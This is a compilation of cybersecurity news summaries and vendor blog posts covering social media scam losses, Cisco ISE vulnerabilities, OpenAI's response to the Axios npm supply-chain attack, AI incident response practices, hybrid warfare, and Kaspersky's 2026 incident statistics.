
U.S. Consumers Lost $2.1 Billion in Social Media Scams in 2025, FTC Says

An FTC report says that Americans last year lost $2.1 billion to social media scams such as shopping and investment schemes. Social media sites have become the place where most of these scams start, and more than half of that money was stolen in scams that began on Facebook, WhatsApp, and Instagram.

The post U.S. Consumers Lost $2.1 Billion in Social Media Scams in 2025, FTC Says appeared first on Security Boulevard.

China-Backed Groups are Using Massive Botnets in Espionage, Intrusion Campaigns


China-sponsored threat groups like Salt Typhoon and Flax Typhoon are increasingly relying on multiple massive botnets comprising edge and IoT devices to run their cyber espionage and network intrusion campaigns, CISA and other security agencies say. The use of such "covert networks" makes it more difficult to detect and mitigate their campaigns.

The post China-Backed Groups are Using Massive Botnets in Espionage, Intrusion Campaigns appeared first on Security Boulevard.

Cisco Patches Critical ISE Vulnerabilities Allowing Remote Code Execution Attacks


Cisco has released security updates to fix multiple vulnerabilities in its Identity Services Engine and Webex Services, warning that successful exploitation could lead to remote code execution, root-level access, and user impersonation. The Cisco ISE vulnerabilities affect widely used enterprise authentication and collaboration systems, making patching a priority for organizations. The Cisco ISE vulnerabilities and the Webex Services flaw have not been observed in active exploitation so far. However, the company has urged customers to update affected systems immediately to reduce risk exposure.

Critical Cisco ISE Vulnerabilities Enable Remote Code Execution

The most severe issues impact Cisco Identity Services Engine (ISE) and its Passive Identity Connector (ISE-PIC). These Cisco ISE vulnerabilities stem from insufficient validation of user-supplied input, a flaw that allows attackers to send specially crafted HTTP requests to targeted systems. Among them, CVE-2026-20147 carries a CVSS score of 9.9 and allows an authenticated attacker with administrative credentials to execute arbitrary commands on the underlying operating system. According to Cisco, this could enable attackers to gain user-level access and then escalate privileges to root. Two additional vulnerabilities, CVE-2026-20180 and CVE-2026-20186, also rated 9.9, allow attackers with read-only administrative access to execute arbitrary commands. These Cisco ISE vulnerabilities highlight how even limited privileges can be leveraged for deeper system compromise. Cisco noted that exploitation in single-node deployments could disrupt services entirely, potentially leading to a denial-of-service condition where new endpoints cannot authenticate to the network.

Webex Services Flaw Risks User Impersonation

Alongside the Cisco ISE vulnerabilities, a critical issue has been identified in Cisco Webex Services. Tracked as CVE-2026-20184 with a CVSS score of 9.8, the flaw affects single sign-on integration with Control Hub. This vulnerability is caused by improper certificate validation and could allow an unauthenticated remote attacker to impersonate any user within the service. Successful exploitation could result in unauthorized access to legitimate Webex accounts, raising concerns for enterprises relying on the platform for communication and collaboration.

Affected Versions and Exposure

The Cisco ISE vulnerabilities impact multiple versions of the platform. All Cisco ISE versions 3.5 and earlier are affected by CVE-2026-20147, while versions 3.4 and earlier are vulnerable to CVE-2026-20180 and CVE-2026-20186. Cisco ISE-PIC systems are also impacted regardless of configuration. For Webex Services, the vulnerability affects deployments using SSO integration with Control Hub. Cisco emphasized that the vulnerabilities are independent of each other, meaning exploitation of one does not require another. Some versions may be affected by specific flaws while not impacted by others.

No Workarounds Available, Patching is Essential

Cisco has confirmed that there are no workarounds to mitigate these vulnerabilities. Organizations must apply the available software updates to fully address the risks. Fixed releases have been issued across supported versions. For example, patches include ISE 3.1 Patch 11, 3.2 Patch 10, 3.3 Patch 11, 3.4 Patch 6, and 3.5 Patch 3. Systems running versions earlier than 3.1 are advised to migrate to a supported release. Security teams are also advised to review system configurations and ensure that upgrade prerequisites such as hardware compatibility and memory requirements are met before deployment.

No Active Exploitation Reported But Risk Remains High

The Cisco Product Security Incident Response Team has stated that it is not aware of any public exploitation or malicious use of these vulnerabilities at the time of disclosure. The issues were reported by Jonathan Lein of TrendAI Research. Despite the lack of active attacks, the severity of the Cisco ISE vulnerabilities and the Webex flaw places them in a high-risk category. Vulnerabilities that allow remote code execution or user impersonation are often targeted quickly once technical details become public.

Security Implications for Enterprises

The Cisco ISE vulnerabilities are particularly significant because ISE plays a central role in network access control, authentication, and policy enforcement. A compromise could provide attackers with deep visibility and control over enterprise networks. Similarly, the Webex vulnerability introduces risks to identity and access management, especially in environments that rely on SSO for centralized authentication. Organizations using affected products are advised to prioritize patching, restrict administrative access where possible, and monitor systems for suspicious activity. Cisco has made detailed advisories and upgrade guidance available through its security portal, and customers are encouraged to follow official recommendations to secure their environments.

NIST, Overrun by Massive Numbers of Submitted CVEs, Limits Analysis Work


NIST said it is overwhelmed by the surge in CVE submissions in recent years, so it is paring back the analysis work it does on these dangerous security flaws. Security experts say the number of new vulnerabilities detected will only grow during the AI era and that the private sector will need to pick up the slack left by NIST's decision.

The post NIST, Overrun by Massive Numbers of Submitted CVEs, Limits Analysis Work appeared first on Security Boulevard.

Incident response for AI: Same fire, different fuel

When a traditional security incident hits, responders replay what happened. They trace a known code path, find the defect, and patch it. The same input produces the same bad output, and a fix proves it will not happen again. That mental model has carried incident response for decades.

AI breaks it. A model may produce harmful output today, but the same prompt tomorrow may produce something different. The root cause is not a line of code; it is a probability distribution shaped by training data, context windows, and user inputs that no one predicted. Meanwhile, the system is generating content at machine speed. A gap in a safety classifier does not leak one record. It produces thousands of harmful outputs before a human reviewer sees the first one.

Fortunately, most of the fundamentals that make incident response (IR) effective still hold true. The instincts that seasoned responders have developed over time still apply: prioritizing containment, communicating transparently, and learning from each incident.

AI introduces new categories of harm, accelerates response timelines, and calls for skills and telemetry that many teams are still developing. This post explores which practices remain effective and which require fresh preparation.

The fundamentals still hold

The core insight of crisis management applies to AI without modification: the technical failure is the mechanism, but trust is the actual system under threat. When an AI system produces harmful output, leaks training data, or behaves in ways users did not expect, the damage extends beyond the technical artifact. Trust has technical, legal, ethical, and social dimensions. Your response must address all of them, which is why incident response for AI is inherently cross-functional.

Several established principles transfer directly.

Explicit ownership at every level. Someone must be in command. The incident commander synthesizes input from domain experts; they do not need to be the deepest technical expert in the room. What matters is that ownership is clear and decision-making authority is understood.

Containment before investigation. Stop ongoing harm first. Investigation runs in parallel, not after containment is complete. For AI systems, this might mean disabling a feature, applying a content filter, or throttling access while you determine scope.

Escalation should be psychologically safe. The cost of escalating unnecessarily is minor. The cost of delayed escalation can be severe. Build a culture where raising a flag early is expected, not penalized.

Communication tone matters as much as content. Stakeholders tolerate problems. They cannot tolerate uncertainty about whether anyone is in control. Demonstrate active problem-solving. Be explicit about what you know, what you suspect, and what you are doing about each.

These principles are tested, and they are effective in guiding action. The challenge with AI is not that these principles no longer apply; it is that AI introduces conditions where applying them requires new information, new tools, and new judgment.

Where AI changes the equation

Non-determinism and speed are the headline shifts, but they are not the only ones.

New harm types complicate classification and triage. Traditional IR taxonomies center on confidentiality, integrity, and availability. AI incidents can involve harms that do not fit those categories cleanly: generating dangerous instructions, producing content that targets specific groups, or enabling misuse through natural language interfaces. By making advanced capabilities easy to use, these interfaces enable untrained users to perform complex actions, increasing the risk of misuse or unintended harm. This is why we need an expanded taxonomy. If your incident classification system lacks categories for these harms, your triage process will default to “other” and lose signal.
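To make the taxonomy point concrete, here is a minimal sketch of an expanded triage classification. The category names and keyword rules below are invented for illustration, not drawn from any published taxonomy or from the post itself:

```python
from enum import Enum

# Hypothetical harm categories extending the classic CIA triad for AI incidents.
class HarmCategory(Enum):
    CONFIDENTIALITY = "confidentiality"      # data leakage, training-data extraction
    INTEGRITY = "integrity"                  # tampered weights, poisoned pipelines
    AVAILABILITY = "availability"            # model or endpoint outage
    DANGEROUS_CONTENT = "dangerous_content"  # instructions enabling real-world harm
    TARGETED_CONTENT = "targeted_content"    # output directed at specific groups
    CAPABILITY_MISUSE = "capability_misuse"  # misuse via natural language interfaces

def triage(report_text: str) -> HarmCategory:
    """Toy keyword triage; a real system would use a trained classifier."""
    keywords = {
        "leak": HarmCategory.CONFIDENTIALITY,
        "outage": HarmCategory.AVAILABILITY,
        "instructions": HarmCategory.DANGEROUS_CONTENT,
    }
    for word, category in keywords.items():
        if word in report_text.lower():
            return category
    # Default to a named AI-specific bucket rather than a signal-losing "other".
    return HarmCategory.CAPABILITY_MISUSE
```

The point is structural: every report lands in a named category that routing and metrics can act on, instead of piling up in "other".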

Severity resists simple quantification. A model producing inaccurate medical information is a different severity than the same model producing inaccurate trivia answers. Good severity frameworks guide judgment; they cannot replace it. For AI incidents, the context around who is affected and how they are affected carries more weight than traditional security metrics alone can capture.

Root cause is often multi-dimensional. In traditional incidents, you find the bug and fix it. In AI incidents, problematic behavior can emerge from the interaction of training data, fine-tuning choices, user context, and retrieval inputs. Investigation may narrow the contributing factors without isolating one defect. Your process must accommodate that ambiguity rather than stalling until certainty arrives.

Before the crisis is the time to work through these implications. The questions that matter: How and when will you know? Who is on point and what is expected of them? What is the response plan? Who needs to be informed, and when? Every one of these questions that you answer before the incident is time you buy during it.

Closing the gaps in telemetry, tooling, and response

If AI changes the nature of incidents, it also changes what you need in order to detect and respond to them.

Observability is the first gap. Traditional security telemetry monitors network traffic, authentication events, file system changes, and process execution. AI incidents generate different signals: anomalous output patterns, spikes in user reports, shifts in content classifier confidence scores, unexpected model behavior after an update. Many organizations have not yet instrumented AI systems for these signals and, without clear signal, defenders may first learn about incidents from social media or customer complaints. Neither provides the early warning that effective response requires.
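As a sketch of what instrumenting one such signal might look like, the toy monitor below flags sharp shifts in a safety classifier's confidence scores using a rolling z-score. The window size and threshold are arbitrary assumptions, not tuned values from any real deployment:

```python
from collections import deque
from statistics import mean, stdev

class ConfidenceDriftMonitor:
    """Illustrative drift detector over a safety classifier's confidence scores."""

    def __init__(self, window: int = 100, z_threshold: float = 3.0):
        self.scores = deque(maxlen=window)  # rolling baseline of recent scores
        self.z_threshold = z_threshold

    def observe(self, score: float) -> bool:
        """Return True if `score` deviates sharply from the recent baseline."""
        alert = False
        if len(self.scores) >= 30:  # require a minimal baseline first
            mu, sigma = mean(self.scores), stdev(self.scores)
            if sigma > 0 and abs(score - mu) / sigma > self.z_threshold:
                alert = True  # candidate signal for the IR on-call
        self.scores.append(score)
        return alert
```

A real pipeline would aggregate such signals alongside user-report spikes and post-update behavior diffs; the sketch only shows that the telemetry is cheap to emit once you decide to collect it.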

AI systems are built with strong privacy defaults – minimal logging, restricted retention, anonymized inputs – and those same defaults narrow the forensic record when you need to establish what a user saw, what data the model touched, or how an attacker manipulated the system. Privacy-by-design and investigative capability require deliberate reconciliation before an incident, because that decision does not get easier once the clock is running.

AI can also help close these gaps. We use AI in our own response operations to enhance our ability to:

  • Detect anomalous outputs as they occur
  • Enforce content policies at system speed
  • Examine model outputs at volumes no human team can match
  • Distill incident discussions so responders spend time deciding rather than reading
  • Coordinate across response workstreams faster than email chains allow

Staged remediation reflects the reality of AI fixes. Incidents require both swift action and thorough review. A model behavior change or guardrail update may not be immediately verifiable in the way a traditional patch is. We use a three-stage approach:

  • Stop the bleed. Tactical mitigations: block known-bad inputs, apply filters, restrict access. The goal is reducing active harm within the first hour.
  • Fan out and strengthen. Broader pattern analysis and expanded mitigations over the next 24 hours, covering thousands of related items. Automation is essential here; manual review cannot keep pace.
  • Fix at the source. Classifier updates, model adjustments, and systemic changes based on what investigation revealed. This stage takes longer, and that is acceptable. The first two stages bought time.

One practical tip: tactical allow-and-block lists are a necessary triage tool, but they are a losing proposition as a permanent solution. Adversaries adapt. Classifiers and systemic fixes are the durable answer.
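The brittleness of literal block lists is easy to demonstrate. In this hedged sketch (the blocked phrase and normalization steps are invented examples), an exact-substring filter is evaded by trivial obfuscation that a normalizing filter still catches, and a determined adversary adapts past both:

```python
import unicodedata

# Toy "stop the bleed" filter; the phrase list is a placeholder.
BLOCKED_PHRASES = {"make a weapon"}

def naive_filter(prompt: str) -> bool:
    """Exact substring match: easy to deploy, easy to evade."""
    return any(p in prompt.lower() for p in BLOCKED_PHRASES)

def normalized_filter(prompt: str) -> bool:
    """Slightly hardened: strip accents and collapse spacing before matching.
    Adversaries still adapt, which is why classifiers are the durable fix."""
    text = unicodedata.normalize("NFKD", prompt)
    text = "".join(c for c in text if not unicodedata.combining(c))
    text = " ".join(text.lower().split())
    return any(p in text for p in BLOCKED_PHRASES)
```

Each normalization step buys time against one evasion class; the arms race only ends when the systemic fix from stage three lands.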

Watch periods after remediation matter more for AI than for traditional patches. Because model behavior is non-deterministic, verification relies on sustained testing and monitoring across varied conditions rather than a single test pass, and monitoring after each stage confirms that the remediation holds.

The human dimension

There is a dimension of AI incident response that traditional IR addresses unevenly and that AI makes urgent: the wellbeing of the people doing the work.

Defenders handling AI abuse reports and safety incidents are routinely exposed to harmful content. This is not the same cognitive load as analyzing malware samples or reviewing firewall logs. Exposure to graphic, violent, or exploitative material has measurable psychological effects, and extended incidents compound that exposure over days or weeks.

Human exhaustion threatens correctness, continuity, and judgment in any prolonged incident. AI safety incidents place an additional emotional burden on responders due to exposure to distressing content. Recognizing and addressing this challenge is essential, as it directly impacts the well-being of the team and the quality of the response.

What helps:

  • Talk to your team about well-being before the crisis, not during it.
  • Manager-sponsored interventions during extended response work, including scheduled breaks, structured handoffs, and deliberate activities that provide cognitive relief.
  • Some teams use structured cognitive breaks, including visual-spatial activities, to reduce the impact of prolonged exposure to harmful content.
  • Coaching and peer mentoring programs normalize the impact rather than framing it as individual weakness.
  • Leverage proven practices from safety content moderation teams, whose operational workflows for content review and escalation map directly to AI security moderation; this is a natural collaboration opportunity.

If your incident response plan does not account for the humans executing it, the plan is incomplete.

Looking ahead

Incident response for AI is not a solved problem. The threat surface is evolving as models gain new capabilities, as agentic architectures introduce autonomous action, and as adversaries learn to exploit natural language at scale. The teams that will handle this well are the ones building adaptive capacity now. Extend playbooks. Instrument AI systems for the right signals. Rehearse novel scenarios. Invest in the people who will be on the front line when something breaks. Good response processes limit damage. Great ones make you stronger for the next incident.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Incident response for AI: Same fire, different fuel appeared first on Microsoft Security Blog.

OpenAI Responds to Axios npm Supply Chain Attack, Rotates macOS Certificates


The fallout from the Axios npm supply chain attack continues to widen, with OpenAI issuing a detailed response outlining its exposure and remediation steps. The Axios npm supply chain attack, reported by The Cyber Express on April 1, has since been linked to North Korea’s Lazarus Group, significantly expanding the scope and impact of the incident. Attribution was confirmed by Google Threat Intelligence Group, which identified the activity under UNC1069, a financially motivated group active since at least 2018.

OpenAI Confirms Limited Exposure to Axios npm Supply Chain Attack

In its official statement, OpenAI said, “We recently identified a security issue involving a third-party developer tool, Axios, that was part of a widely reported, broader industry incident⁠.” The company clarified that while it was affected by the broader Axios npm supply chain attack, there is no evidence of compromise to user data or internal systems. “We found no evidence that OpenAI user data was accessed, that our systems or intellectual property was compromised, or that our software was altered,” the statement added. The exposure occurred on March 31, 2026, when a GitHub Actions workflow used in OpenAI’s macOS app-signing process executed a malicious version of Axios (v1.14.1). This workflow had access to sensitive code-signing certificates used for validating OpenAI applications like ChatGPT Desktop, Codex, Codex CLI, and Atlas.

Certificate Rotation and macOS App Updates

As a direct response to the Axios npm supply chain attack, OpenAI has initiated a full rotation of its macOS code-signing certificates. While internal analysis suggests the certificate was likely not exfiltrated, the company is treating it as potentially compromised. To mitigate any residual risk, OpenAI is requiring users to update their macOS applications. Older versions of affected apps will lose support and functionality after May 8, 2026. Updated versions will carry new certificates to ensure authenticity. This move is designed to prevent threat actors from distributing malicious software disguised as legitimate OpenAI applications, a known risk in supply chain attacks involving code-signing materials.

Investigation and Security Measures

OpenAI engaged a third-party digital forensics and incident response firm to investigate the impact of the Axios npm supply chain attack. The company also coordinated with Apple to block any new notarization attempts using the old certificate. Additional steps taken include:
  • Publishing new builds of all affected macOS applications
  • Reviewing all past software notarizations for anomalies
  • Ensuring no unauthorized modifications were made to distributed software
The company confirmed that no malicious applications signed with its certificate have been identified so far.

Root Cause: GitHub Workflow Misconfiguration

The root cause of OpenAI’s exposure to the Axios npm supply chain attack was traced to a misconfiguration in its GitHub Actions workflow. Specifically, the workflow relied on a floating tag instead of a fixed commit hash and lacked a minimum release age for dependencies, both of which increased the risk of pulling compromised packages. This highlights a broader industry issue where development pipelines remain vulnerable to upstream compromises, especially in open-source ecosystems.
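The two weaknesses named above can be sketched in GitHub Actions syntax. The action name and commit SHA below are placeholders for illustration, not details of OpenAI's actual workflow:

```yaml
steps:
  # Risky: a floating tag can be repointed to a compromised release at any time
  - uses: some-org/setup-tool@v1

  # Safer: pin to a full commit SHA so the resolved code cannot change silently;
  # pairing this with a minimum release age for new dependency versions adds a
  # buffer against freshly published malicious packages
  - uses: some-org/setup-tool@0123456789abcdef0123456789abcdef01234567  # v1.2.3
```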

No Impact on User Data or Other Platforms

OpenAI emphasized that the incident is limited strictly to macOS applications. There is no impact on iOS, Android, Windows, Linux, or web-based services. The company also reassured users:
  • No user data or API keys were compromised
  • No passwords need to be changed
  • No malware signed as OpenAI has been detected

What Happens Next

OpenAI will fully revoke the old certificate on May 8, 2026, after a 30-day transition window. This approach is intended to minimize disruption while ensuring users have adequate time to update their applications. The company noted that any software signed with the old certificate will be blocked by macOS security protections after revocation, further reducing the risk of misuse.

Growing Impact of Axios npm Supply Chain Attack

The Axios npm supply chain attack highlights the escalating risks tied to third-party software dependencies. With attribution pointing to a state-sponsored group, the incident reflects how supply chain attacks are increasingly being leveraged for financial and strategic objectives. As organizations continue to rely heavily on open-source libraries, the incident serves as a reminder of the need for stricter dependency management, secure development practices, and continuous monitoring of software pipelines.

SIEM Detection is Failing. Here’s What Stronger Teams Do Instead. 

cost, visibility, SIEM model, data, SIEM, teams, Elastic SIEM LogPoint security employees

Stop running your SOC like it’s 2012. Learn why modern detection engineering requires shifting away from legacy SIEM architectures toward a product-centric strategy that prioritizes data quality, contextual enrichment, and AI-native workflows over raw log volume.

The post SIEM Detection is Failing. Here’s What Stronger Teams Do Instead.  appeared first on Security Boulevard.

Hasbro Cyberattack Knocks Systems Offline, Recovery Could Take Weeks

Hasbro is investigating a cyberattack that forced systems offline, warning recovery could take weeks as it works to contain the incident and assess the impact.

The post Hasbro Cyberattack Knocks Systems Offline, Recovery Could Take Weeks appeared first on TechRepublic.

Hybrid Warfare 2026: When Cyber Operations and Kinetic Attacks Converge


In 2026, hybrid warfare is no longer a theoretical construct discussed in policy circles; it is shaping geopolitical conflict in real time. The convergence of cyber warfare and kinetic attacks has transformed how nations project power, blending missiles, malware, and misinformation into unified campaigns. What distinguishes modern hybrid warfare from earlier conflicts is not just the presence of digital operations, but their synchronization with physical strikes to produce layered, systemic disruption. 

Nowhere is this more evident than in the Middle East, where escalating tensions have turned the region into a proving ground for cyber-physical warfare. Governments, energy systems, financial networks, and communication infrastructures are being targeted simultaneously, exposing vulnerabilities that extend far beyond national borders. The result is a battlespace where the frontlines are both physical and invisible, and where disruption can ripple globally within hours. 

From Conflict to Convergence: The Rise of Cyber Physical Warfare 

The turning point came on February 28, 2026, when coordinated military and cyber campaigns marked a new phase in hybrid war strategy. Joint operations combined airstrikes with cyberattacks, information warfare, and psychological operations, targeting nuclear facilities, military assets, and digital infrastructure in parallel. Internet connectivity in targeted regions dropped to as low as 1–4% of normal levels during the initial assault, demonstrating the effectiveness of integrated cyber warfare and kinetic attacks. 

These operations were not designed for immediate destruction alone. Instead, they aimed to disorient command structures, disrupt civilian communication, and weaken public trust. Digital interference extended to media channels and widely used mobile applications, some of which were compromised to spread false information and induce panic. 

The response was equally multifaceted. Within 72 hours, missile and drone strikes were accompanied by a surge in cyber activity, including spear-phishing campaigns, ransomware-style attacks, and coordinated data exfiltration efforts targeting energy grids, airports, and financial institutions. 

Hacktivists as Force Multipliers in Modern Hybrid Warfare 

One of the defining characteristics of modern hybrid warfare is the role of non-state actors. More than 70 hacktivist groups became active participants in the 2026 conflict, blurring the lines between state-sponsored operations and independent cyber activism. These groups executed distributed denial-of-service (DDoS) attacks, website defacements, and credential harvesting campaigns across multiple countries. 

Their involvement amplifies the scale and unpredictability of cyber warfare and kinetic attacks. While some groups operate with ideological motivations, others appear loosely aligned with state objectives, acting as force multipliers without formal attribution. This ambiguity complicates response strategies and increases the risk of escalation. 

Cyber campaigns emerged during this period, including fake missile alert applications designed to harvest sensitive user data such as contacts, messages, and device identifiers. These tools demonstrated a level of technical refinement typically associated with advanced persistent threat (APT) groups. 

Iranian Cyber Capabilities and Strategic Depth 

Despite early disruptions to its infrastructure, Iran maintained a resilient cyber posture throughout the conflict. Established threat groups continued to conduct espionage, infrastructure attacks, and credential theft operations targeting sectors such as energy, aviation, and telecommunications. 

Parallel to these efforts, Iran-aligned hacktivist groups escalated disruptive campaigns, including industrial control system intrusions and data leaks. Some reports suggest coordination with Russia-linked actors. 

A notable example is the emergence of hybrid threat actors employing destructive malware. Tools designed to overwrite system data, disable operating systems, and erase critical infrastructure highlight a shift toward more aggressive cyber physical warfare tactics. These operations are often executed in stages: initial access through phishing or exposed services, lateral movement using legitimate system tools, and eventual payload deployment designed for maximum disruption. 

Infrastructure Disruption and Global Spillover Effects 

The consequences of hybrid warfare are not confined to the immediate conflict zone. Early incidents in 2026 disrupted fuel distribution in Jordan and interfered with navigation systems, affecting over 1,100 vessels near the Strait of Hormuz. These disruptions pose significant risks to global oil and gas supply chains, illustrating how localized cyber warfare and kinetic attacks can have worldwide economic implications. 

Countries like India are experiencing indirect exposure due to interconnected digital ecosystems. Supply chain dependencies, shared technologies, and cloud-based services create pathways for cyber threats to propagate across borders. Vulnerabilities in widely used platforms, including VPNs and enterprise communication systems, are actively exploited. 

Attackers are also leveraging AI-driven techniques to enhance their effectiveness. Phishing campaigns now use highly personalized messaging, while automated reconnaissance tools map organizational structures to identify high-value targets. These capabilities reduce the time required to execute complex attacks and increase their success rates. 

Cybercrime Exploitation in a Hybrid War Environment 

Geopolitical instability has created fertile ground for cybercriminal activity. More than 8,000 domains linked to the 2026 conflict have been registered, many serving as platforms for scams, malware distribution, and misinformation campaigns. 

Examples include fake donation websites, fraudulent e-commerce platforms, and cryptocurrency schemes designed to exploit public sentiment. Conflict-themed malware, often disguised as alert systems or news updates, has been used to deploy backdoors and establish persistent access to compromised systems. 

This convergence of cybercrime and state-aligned activity reflects a broader trend: the industrialization of cyber threats. Ransomware-as-a-service platforms now provide end-to-end attack capabilities, lowering the barrier to entry for less experienced actors. With subscription costs as low as $500 per month, cyberattacks are becoming accessible to a far wider pool of actors. 

India’s Evolving Role in the Hybrid Warfare Landscape 

India’s cybersecurity environment in 2026 reflects many of the same dynamics observed in the Middle East. State-sponsored actors are focusing on long-term access and intelligence gathering, targeting government networks, defense systems, and critical industries. These operations often remain undetected for extended periods, leveraging advanced persistent techniques to maintain access. 

At the same time, hacktivist groups in India are becoming more organized and technically capable. Their activities now include coordinated data leaks, disruption campaigns, and the use of advanced tools traditionally associated with nation-state actors. 

Supply chain attacks are a growing concern, particularly in sectors undergoing rapid digital transformation. Healthcare, manufacturing, and financial services are vulnerable due to their reliance on interconnected systems. These vulnerabilities highlight the importance of continuous monitoring, vendor risk management, and layered security architectures. 

Intelligence-Driven Defense in the Age of Hybrid War Strategy 

As hybrid warfare evolves, traditional reactive security models are proving insufficient. Organizations are shifting toward intelligence-driven approaches that integrate tactical, operational, strategic, and technical insights. 

This shift is critical in a landscape where attackers exploit legitimate platforms, use “living off the land” techniques, and maintain persistence for extended periods. Behavioral analytics, anomaly detection, and contextual authentication are becoming essential tools for identifying threats that bypass conventional defenses. 

Equally important is the adoption of proactive measures such as multi-factor authentication, network segmentation, and robust incident response frameworks. Information sharing between organizations and governments is also emerging as a key component of resilience in the face of coordinated cyber warfare and kinetic attacks. 

Conclusion 

Hybrid warfare in 2026 is an operational reality. Cyber warfare and kinetic attacks now work in tandem, creating rapid, high-impact disruptions across both digital and physical systems. This is the core of modern hybrid warfare: fast, coordinated, and difficult to contain. 

Defending against this requires a shift to intelligence-led security. In a landscape shaped by cyber physical warfare, organizations need real-time visibility, faster response, and the ability to anticipate threats, not just react to them. Cyble enables this shift with its AI-native platform, Cyble Blaze AI, designed to predict and stop threats before they escalate. 

To strengthen your hybrid war strategy, explore Cyble’s threat intelligence capabilities or schedule a demo to see proactive security in action.

The post Hybrid Warfare 2026: When Cyber Operations and Kinetic Attacks Converge appeared first on Cyble.

Anatomy of a Cyber World Global Report 2026

Kaspersky Security Services provide a comprehensive cybersecurity ecosystem, taking enterprise threat protection to another level. Services such as Kaspersky Managed Detection and Response and Compromise Assessment allow for timely detection of threats and cyberattacks. SOC Consulting offers a practical approach to keeping corporate infrastructure secure, while Incident Response enables timely remediation with a maximized recovery rate.

High-level overview of the MDR, IR and CA connection

This new report brings together statistics across regions and industries from our Managed Detection and Response and Incident Response services, and for the first time, it also includes insights from our Compromise Assessment and SOC Consulting services — all to provide you with a more comprehensive view of different aspects of corporate information security worldwide.

The scope of MDR and IR services

Kaspersky delivers its MDR and IR services globally. The largest shares of customers were located in the CIS (34.7%), the Middle East (20.1%), and Europe (18.6%).

Distribution of customers by geographical region, 2025

MDR telemetry

In line with the previous year’s figures, in 2025 the MDR infrastructure received and processed an average of 15,000 telemetry events per host every day, generating security alerts as a result. These alerts are first processed by AI-powered detection logic, after which Kaspersky SOC analysts handle them as required. In total, approximately 400,000 alerts were generated in 2025. After filtering out false positives, 39,000 alerts were investigated further.
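As a rough illustration of the triage funnel described above, the report's own figures imply that only a small fraction of generated alerts survive false-positive filtering. The function below is just arithmetic on the published numbers, not a representation of the actual pipeline:

```python
# Triage funnel from the report's 2025 figures: ~400,000 alerts generated,
# 39,000 investigated after false-positive filtering. The helper is
# illustrative arithmetic only.
def investigated_share(total_alerts: int, investigated: int) -> float:
    """Fraction of generated alerts that survived false-positive filtering."""
    return investigated / total_alerts

share = investigated_share(400_000, 39_000)
print(f"{share:.1%} of alerts were investigated")  # roughly one in ten
```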

MDR telemetry statistics, 2025

Incident statistics

The distribution of remediation requests by industry has shifted slightly compared to previous years. Government (18.5%) and industrial (16.6%) organizations remain the most targeted industries in terms of cyberattacks requiring incident response activities. However, this year the IT sector saw growth in the number of IR requests, placing third in the overall industry distribution and displacing financial organizations, which were targeted less often than in 2024. The same pattern holds for smaller-scale attacks that can be contained and remediated through automated means, with the difference that medium- and low-severity incidents are more often experienced by financial organizations.

Distribution of all incidents by industry sector, 2025

Key trends and statistics

This section presents key findings and trends in cyberattacks in 2025:

  • The number of high-severity incidents decreased, continuing a downward trend that we’ve been observing since 2021. The majority of those incidents were APT attacks and red teaming exercises, which points to two landscape trends: on the one hand, skilled adversaries are working to increase impact, while on the other, organizations are spending more resources on probing their defense systems.
  • The most common vulnerabilities exploited in the wild were related to Microsoft products. Half of all identified CVEs led to remote code execution, notably without authentication in some cases.
  • Exploitation of public-facing applications, valid accounts, and trusted relationships remain the most popular initial vectors, and their overall share has increased, accounting for over 80% of all attacks in 2025. In particular, attacks through trusted relationships are evolving: their share has increased to 15.5% from 12.8% in 2024. They are also becoming more complex: for instance, we witnessed a case where adversaries had compromised more than two organizations in sequence to ultimately gain access to a third target.
  • Standard Windows utilities remain a popular LotL tool. Adversaries use them to minimize the risk of detection when delivering payloads to a compromised system. The most popular LOLBins we observed in high-severity incidents were powershell.exe (14.4%), rundll32.exe (5.9%), and mshta.exe (3.8%). Among the most popular legitimate tools used in incidents were Mimikatz (14.3%), PowerShell (8.1%), PsExec (7.5%), and AnyDesk (7.5%).
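Because the LOLBins named above are legitimate Windows binaries, defenders typically flag their use in process telemetry and then triage on context such as the command line. The sketch below shows the first, trivial step of that idea; the event schema and field names are illustrative assumptions, as real EDR telemetry formats differ:

```python
# Minimal sketch: flag process-creation events whose image name matches a
# known LOLBin. Event dicts and field names are illustrative assumptions.
LOLBINS = {"powershell.exe", "rundll32.exe", "mshta.exe"}

def flag_lolbin_events(events: list[dict]) -> list[dict]:
    """Return events whose image name (case-insensitive) is a known LOLBin."""
    return [e for e in events if e.get("image", "").lower() in LOLBINS]

events = [
    {"image": "notepad.exe", "cmdline": "notepad.exe report.txt"},
    {"image": "mshta.exe", "cmdline": "mshta.exe http://example.com/app.hta"},
]
for e in flag_lolbin_events(events):
    print("suspicious:", e["cmdline"])
```

In practice, matching on the binary name alone would be far too noisy; detection logic layers on parent process, command-line arguments, and signing information to separate administrative use from abuse.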

The full 2026 Global Report provides additional information about cyberattacks, including real-world cases discovered by Kaspersky experts. We also describe SOC Consulting projects and Compromise Assessment requests. The report includes a comprehensive analysis of initial attack vectors correlated with MITRE ATT&CK tactics and techniques, along with the full list of vulnerabilities that we detected during Incident Response engagements.

Prevention is the Only Cloud Security Strategy That Works 

In the evolving digital economy, adopting a prevention-first strategy for cloud workflows is essential. This article explores the importance of preemptive security measures to protect sensitive operations from breaches, detailing steps for organizations to enhance their security posture.

The post Prevention is the Only Cloud Security Strategy That Works  appeared first on Security Boulevard.

FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System

The FBI, CISA, and NSA reportedly are investigating the hack by an unnamed "sophisticated" actor of an FBI surveillance system that holds sensitive information. The breach carries the hallmarks of Chinese nation-state groups and comes amid concerns about attacks in the wake of the war against Iran and the shrinking of the federal cybersecurity apparatus.

The post FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System appeared first on Security Boulevard.
